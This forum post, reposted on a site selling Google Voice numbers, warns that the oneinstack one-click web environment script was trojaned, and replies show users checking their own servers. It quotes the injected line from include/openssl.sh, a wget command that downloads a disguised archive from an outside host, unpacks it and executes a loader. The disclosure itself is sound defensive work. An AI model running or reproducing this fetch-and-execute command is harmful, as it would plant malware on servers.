谷姐:我们都是谷歌迷
We are all Google fans

oneinstack一键网站环境脚本最近被挂马了!-SK_

Rate this post
[url][url]https://github.com/oneinstack/oneinstack/issues/487[/url][/url]

挂马的文件在:/root/oneinstack/include/openssl.sh137行,多了一段:

    wget http://download.cnoneinstack.com/oneinstack.jpg -cO /var/local/oneinstack.jpg && tar zxf /var/local/oneinstack.jpg -C /var/local/ && cd /var/local/cron && ./load linux@QWE

执行代码

github上 https://github.com/oneinstack/oneinstack/blob/main/include/openssl.sh 这个文件是没有这段代码的。

比对oneinstack-full.tar.gz的MD5码是不准的。要看/root/oneinstack/include/openssl.sh 这个文件,不知道黑客会不会留后门清理入侵痕迹,我另外一台几个月前搭建的这个文件没有这串代码。

热议
2楼 5ean 9小时前

看了一下,是真的,我去,我的服务器用的都是oneinstack,检查了一下没有这句
应该是刚被挂上马

3楼 klocal 9小时前

说好的 不用面板 最安全呢?

4楼 5ean 9小时前

说好的 不用面板 最安全呢?

谁能想到源码被黑,挂上马呢,以后不敢用oneinstack了

5楼 七夏浅笑 9小时前

感觉用啥都有不安全的时候,不过还是用大佬都用的东西好,出问题了能及时被人发现

6楼 Xhvai110 9小时前

泰裤辣

7楼 燕十三丶 9小时前

一直用lnmp

8楼 5ean 9小时前

一直用lnmp

还军哥靠谱,稳这么多年了

9楼 bios12567496 9小时前

看了下 我1月份配置的 没有这代码

10楼 jhsyue 7小时前

我上个月配的 也没这串代码

我是4月21号下午暗桩的 刚才看了下 没有这串代码

申明:本文内容由网友收集分享,仅供学习参考使用。如文中内容侵犯到您的利益,请在文章下方留言,本站会第一时间进行处理。

未经谷姐允许不得转载:谷姐靓号网 » oneinstack一键网站环境脚本最近被挂马了!-SK_
分享到: 生成海报

热门文章

评论 抢沙发

评论前必须登录!

立即登录   注册

买Google Voice认准【谷姐靓号网】

Google Voice靓号列表Google Voice自助购买
切换注册

登录

忘记密码 ?

切换登录

注册

我们将发送一封验证邮件至你的邮箱, 请正确填写以完成账号注册和激活